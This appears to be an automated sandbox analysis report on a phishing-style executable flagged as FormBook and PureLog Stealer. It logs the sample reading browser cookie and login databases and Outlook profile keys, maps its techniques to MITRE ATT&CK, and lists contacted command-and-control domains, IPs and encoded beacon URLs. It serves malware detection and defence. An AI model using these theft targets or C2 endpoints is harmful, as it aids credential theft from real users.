Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\PO0424024.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.PO0424024.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PO0424024.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.4170807354.00000000034D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2174491857.00000000012C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4170764124.0000000003490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4157652949.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4176035041.0000000008660000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2172226006.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2174679636.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4170805786.0000000002800000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.PO0424024.exe.6e70000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO0424024.exe.6e70000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO0424024.exe.36f9970.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO0424024.exe.36f9970.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1735920141.0000000006E70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1729875673.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\takeown.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\takeown.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.PO0424024.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PO0424024.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.4170807354.00000000034D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2174491857.00000000012C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4170764124.0000000003490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4157652949.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4176035041.0000000008660000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2172226006.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2174679636.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4170805786.0000000002800000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.PO0424024.exe.6e70000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO0424024.exe.6e70000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO0424024.exe.36f9970.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO0424024.exe.36f9970.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1735920141.0000000006E70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1729875673.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	312 Process Injection	1 Masquerading	1 OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	11 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	312 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Deobfuscate/Decode Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	22 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Timestomp	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 DLL Side-Loading	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Link
PO0424024.exe	32%	ReversingLabs
PO0424024.exe	31%	Virustotal	Browse
PO0424024.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
www.klconstructions.net	0%	Virustotal	Browse
threesomeapps.com	0%	Virustotal	Browse
www.cd14j.us	0%	Virustotal	Browse
www.celebration24.co.uk	1%	Virustotal	Browse
www.happymarts.top	1%	Virustotal	Browse
www.luckydomainz.shop	0%	Virustotal	Browse
www.threesomeapps.com	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	Avira URL Cloud	safe
http://www.threesomeapps.com/pq0o/	0%	Avira URL Cloud	safe
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.kakaobrain.us/pq0o/	0%	Avira URL Cloud	safe
https://mail.365.com/login.html	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
https://www.marksmile.com/	0%	Avira URL Cloud	safe
http://www.unchainedventure.com/pq0o/	0%	Avira URL Cloud	safe
http://tempuri.org/DataSet1.xsd	0%	Avira URL Cloud	safe
https://mail.365.com/login.html	0%	Virustotal		Browse
https://www.fasthosts.co.uk/domain-names/search/?domain=$	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	Virustotal		Browse
https://www.fasthosts.co.uk/domain-names/search/?domain=$	0%	Virustotal		Browse
http://www.founder.com.cn/cn/cThe	0%	Avira URL Cloud	safe
http://www.shun-yamagata.com/pq0o/?9ZZXx=T6kxVZuXAVuH9J&F49hs=b2qFmWlReUJu6citZAtbwrrOSkIcZF9V2+9XddDidwLqjCK16JlrjYTgkvrAjFAj/kbk/ZD/H0dWxyKKd1m8GF0arunEMZ5tvTjrHaUhlNNo1MItznWZgp0=	0%	Avira URL Cloud	safe
https://fasthosts.co.uk/	0%	Avira URL Cloud	safe
http://tempuri.org/DataSet1.xsd	2%	Virustotal		Browse
https://www.fasthosts.co.uk/get-online?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_	0%	Avira URL Cloud	safe
http://www.marksmile.com/asset/lp_qrcode.png	0%	Avira URL Cloud	safe
http://www.klconstructions.net/pq0o/?9ZZXx=T6kxVZuXAVuH9J&F49hs=p2Os9DL/ZxMFxY/q2Ap/Yp5OBLYS19DXFnG8XGpKHfd79mzMsmb8450rEHnCTj1drUgFrotC1uV7Mqyg6tK80c0eBV3oPBtu8fCz/gVC+CE8Jn7lRxODf9w=	0%	Avira URL Cloud	safe
https://www.marksmile.com/	0%	Virustotal		Browse
http://www.celebration24.co.uk/pq0o/?9ZZXx=T6kxVZuXAVuH9J&F49hs=NMNyNvSWAQl+XC9g7rBusjWgWNBgohatDhvK1KIHhjj0aHE/UrTu3yYXFvlKPRx40FckhBe9K4BGmhcAc+bYC4VcVVEG0KUeJFitahxkTU5y9cpDhM+xwHc=	0%	Avira URL Cloud	safe
https://fasthosts.co.uk/	0%	Virustotal		Browse
http://www.zhongyicts.com.cn	0%	Avira URL Cloud	safe
http://www.kakaobrain.us/pq0o/?F49hs=BhpYg4yoBpmopPUlJaseZ9A32WKe1CLsx7T3vymtgFCfsO9mDgtC+XcLrPQxM3XDzIUIWI4YDMWjav9FDMEzU1DT6w46OubC82AXo7xlEXtHI7IZbAZeHk0=&9ZZXx=T6kxVZuXAVuH9J	0%	Avira URL Cloud	safe
https://www.fasthosts.co.uk/get-online?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_	0%	Virustotal		Browse
http://www.founder.com.cn/cn/cThe	0%	Virustotal		Browse
http://www.luckydomainz.shop/pq0o/	0%	Avira URL Cloud	safe
http://www.celebration24.co.uk/pq0o/	0%	Avira URL Cloud	safe
http://www.happymarts.top/pq0o/?9ZZXx=T6kxVZuXAVuH9J&F49hs=4UCjKZAQgLnMxNicE9pqcHmXIZhn5ynD4ggafyrMLg7tBb5+FldYarQ4uWITApeKqaBZVuXxHE31Fdk4aV2tLvZQCfORxMIFcNC7KFHj2TQuLtYW7VfXj0w=	0%	Avira URL Cloud	safe
http://www.marksmile.com/asset/lp_qrcode.png	1%	Virustotal		Browse
http://www.cd14j.us/pq0o/?9ZZXx=T6kxVZuXAVuH9J&F49hs=zdIBKqN9oP3plxVQyNgvYq0mMKrvq5q/57+iRklTGjPKULzejm8MTR3zmbqN1d/mp0y1+1mzyQU/+H24oE5uDnI7sp5jy5UFN+aaU0u6oQX+YH9icEJ0mm4=	0%	Avira URL Cloud	safe
http://www.zhongyicts.com.cn	1%	Virustotal		Browse
http://www.unchainedventure.com/pq0o/?F49hs=oyw/nBwJ61bGycTt7MUH34VrSoK42dIQz9F/9DQxJwbLEg40x6X3ShxK/IPLtNyuGmfUrEEfHvul1hK0yfa95YoddznUFYR7i1LwCbVe0J8wy+lXuD76n/g=&9ZZXx=T6kxVZuXAVuH9J	0%	Avira URL Cloud	safe
http://www.luckydomainz.shop/pq0o/	0%	Virustotal		Browse
http://www.xn--yzyp76d.com/pq0o/?9ZZXx=T6kxVZuXAVuH9J&F49hs=J8WC84xruYdLZ+87Afe3OqqbMOMBhnRcdnGo6AhEflv3qioXWy6Vm5wGjKWjZFBj5bzfVwWaJCB72b3lEpkTXSJ8T31vhIsUx1l9uwIaTYdZUjGlsKsX5ww=	0%	Avira URL Cloud	safe
http://www.shun-yamagata.com/pq0o/	0%	Avira URL Cloud	safe
http://www.threesomeapps.com	0%	Avira URL Cloud	safe
http://www.happymarts.top/pq0o/	0%	Avira URL Cloud	safe
https://www.fastmail.help/hc/en-us/articles/1500000280141	0%	Avira URL Cloud	safe
http://www.carsinmultan.com/pq0o/?F49hs=ERhh1Wv2i17OvleZDVlPuLV8FPLSNlSjgSFKCO/E5FvVDH88mB+A3XwhrFKA0T7u6+xnysJANU3lpyUswnu1e2FhmydoRAv58fVG4PjZmouhcgICZXbhSfU=&9ZZXx=T6kxVZuXAVuH9J	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn	0%	Avira URL Cloud	safe
http://www.marksmile.com/asset/lp_style.css	0%	Avira URL Cloud	safe
http://www.klconstructions.net/pq0o/	0%	Avira URL Cloud	safe
https://static.fasthosts.co.uk/icons/favicon.ico	0%	Avira URL Cloud	safe
http://www.cd14j.us/pq0o/	0%	Avira URL Cloud	safe
http://www.luckydomainz.shop/pq0o/?F49hs=zlo+FGSBhCkM5GVJsyQNaVbtL67WnJg88Yj7BD8zO0hDA+Ttp+tE7JQXtFhQSzjU/FmrV36xGrNmbpUbkD9mLWK1UOLjaHYQ4bVPRZ9N4YEmnoiYZJFdoy8=&9ZZXx=T6kxVZuXAVuH9J	0%	Avira URL Cloud	safe
http://www.carsinmultan.com/pq0o/	0%	Avira URL Cloud	safe
http://www.holein1sa.com/pq0o/	0%	Avira URL Cloud	safe
http://www.threesomeapps.com/pq0o/?9ZZXx=T6kxVZuXAVuH9J&F49hs=mRVcZEOhq89+MGHBKj9OIc/04Av6T2wEhyk9HpRK9pO5sVzjQ2X+QIoGEwrX8lym3PQN8R/kDgsMd57+ef1OrGKEsTU4CFRzLSC8xo47mPR0FpBjSaDhnxk=	0%	Avira URL Cloud	safe
https://www.fasthosts.co.uk/contact?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_par	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
carsinmultan.com	84.32.84.32	true	false		unknown
www.xn--yzyp76d.com	47.76.62.167	true	false		unknown
www.klconstructions.net	74.208.236.153	true	false	0%, Virustotal, Browse	unknown
unchainedventure.com	195.242.88.141	true	false		unknown
www.holein1sa.com	213.171.195.105	true	false		unknown
threesomeapps.com	3.33.130.190	true	false	0%, Virustotal, Browse	unknown
parkingpage.namecheap.com	91.195.240.19	true	false		high
www.celebration24.co.uk	103.168.172.37	true	false	1%, Virustotal, Browse	unknown
www.cd14j.us	91.195.240.123	true	false	0%, Virustotal, Browse	unknown
www.happymarts.top	203.161.46.103	true	false	1%, Virustotal, Browse	unknown
www.shun-yamagata.com	162.43.104.164	true	false		unknown
www.kakaobrain.us	unknown	unknown	true		unknown
www.fashionagencylab.com	unknown	unknown	true		unknown
www.carsinmultan.com	unknown	unknown	true		unknown
www.threesomeapps.com	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.luckydomainz.shop	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.jrksa.info	unknown	unknown	true		unknown
www.unchainedventure.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.kakaobrain.us/pq0o/	true	Avira URL Cloud: safe	unknown
http://www.threesomeapps.com/pq0o/	false	Avira URL Cloud: safe	unknown
http://www.unchainedventure.com/pq0o/	false	Avira URL Cloud: safe	unknown
http://www.shun-yamagata.com/pq0o/?9ZZXx=T6kxVZuXAVuH9J&F49hs=b2qFmWlReUJu6citZAtbwrrOSkIcZF9V2+9XddDidwLqjCK16JlrjYTgkvrAjFAj/kbk/ZD/H0dWxyKKd1m8GF0arunEMZ5tvTjrHaUhlNNo1MItznWZgp0=	false	Avira URL Cloud: safe	unknown
http://www.klconstructions.net/pq0o/?9ZZXx=T6kxVZuXAVuH9J&F49hs=p2Os9DL/ZxMFxY/q2Ap/Yp5OBLYS19DXFnG8XGpKHfd79mzMsmb8450rEHnCTj1drUgFrotC1uV7Mqyg6tK80c0eBV3oPBtu8fCz/gVC+CE8Jn7lRxODf9w=	false	Avira URL Cloud: safe	unknown
http://www.celebration24.co.uk/pq0o/?9ZZXx=T6kxVZuXAVuH9J&F49hs=NMNyNvSWAQl+XC9g7rBusjWgWNBgohatDhvK1KIHhjj0aHE/UrTu3yYXFvlKPRx40FckhBe9K4BGmhcAc+bYC4VcVVEG0KUeJFitahxkTU5y9cpDhM+xwHc=	false	Avira URL Cloud: safe	unknown
http://www.kakaobrain.us/pq0o/?F49hs=BhpYg4yoBpmopPUlJaseZ9A32WKe1CLsx7T3vymtgFCfsO9mDgtC+XcLrPQxM3XDzIUIWI4YDMWjav9FDMEzU1DT6w46OubC82AXo7xlEXtHI7IZbAZeHk0=&9ZZXx=T6kxVZuXAVuH9J	true	Avira URL Cloud: safe	unknown
http://www.luckydomainz.shop/pq0o/	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.celebration24.co.uk/pq0o/	false	Avira URL Cloud: safe	unknown
http://www.happymarts.top/pq0o/?9ZZXx=T6kxVZuXAVuH9J&F49hs=4UCjKZAQgLnMxNicE9pqcHmXIZhn5ynD4ggafyrMLg7tBb5+FldYarQ4uWITApeKqaBZVuXxHE31Fdk4aV2tLvZQCfORxMIFcNC7KFHj2TQuLtYW7VfXj0w=	false	Avira URL Cloud: safe	unknown
http://www.cd14j.us/pq0o/?9ZZXx=T6kxVZuXAVuH9J&F49hs=zdIBKqN9oP3plxVQyNgvYq0mMKrvq5q/57+iRklTGjPKULzejm8MTR3zmbqN1d/mp0y1+1mzyQU/+H24oE5uDnI7sp5jy5UFN+aaU0u6oQX+YH9icEJ0mm4=	false	Avira URL Cloud: safe	unknown
http://www.unchainedventure.com/pq0o/?F49hs=oyw/nBwJ61bGycTt7MUH34VrSoK42dIQz9F/9DQxJwbLEg40x6X3ShxK/IPLtNyuGmfUrEEfHvul1hK0yfa95YoddznUFYR7i1LwCbVe0J8wy+lXuD76n/g=&9ZZXx=T6kxVZuXAVuH9J	false	Avira URL Cloud: safe	unknown
http://www.xn--yzyp76d.com/pq0o/?9ZZXx=T6kxVZuXAVuH9J&F49hs=J8WC84xruYdLZ+87Afe3OqqbMOMBhnRcdnGo6AhEflv3qioXWy6Vm5wGjKWjZFBj5bzfVwWaJCB72b3lEpkTXSJ8T31vhIsUx1l9uwIaTYdZUjGlsKsX5ww=	false	Avira URL Cloud: safe	unknown
http://www.shun-yamagata.com/pq0o/	false	Avira URL Cloud: safe	unknown
http://www.happymarts.top/pq0o/	false	Avira URL Cloud: safe	unknown
http://www.carsinmultan.com/pq0o/?F49hs=ERhh1Wv2i17OvleZDVlPuLV8FPLSNlSjgSFKCO/E5FvVDH88mB+A3XwhrFKA0T7u6+xnysJANU3lpyUswnu1e2FhmydoRAv58fVG4PjZmouhcgICZXbhSfU=&9ZZXx=T6kxVZuXAVuH9J	false	Avira URL Cloud: safe	unknown
http://www.klconstructions.net/pq0o/	false	Avira URL Cloud: safe	unknown
http://www.cd14j.us/pq0o/	false	Avira URL Cloud: safe	unknown
http://www.luckydomainz.shop/pq0o/?F49hs=zlo+FGSBhCkM5GVJsyQNaVbtL67WnJg88Yj7BD8zO0hDA+Ttp+tE7JQXtFhQSzjU/FmrV36xGrNmbpUbkD9mLWK1UOLjaHYQ4bVPRZ9N4YEmnoiYZJFdoy8=&9ZZXx=T6kxVZuXAVuH9J	true	Avira URL Cloud: safe	unknown
http://www.carsinmultan.com/pq0o/	false	Avira URL Cloud: safe	unknown
http://www.holein1sa.com/pq0o/	false	Avira URL Cloud: safe	unknown
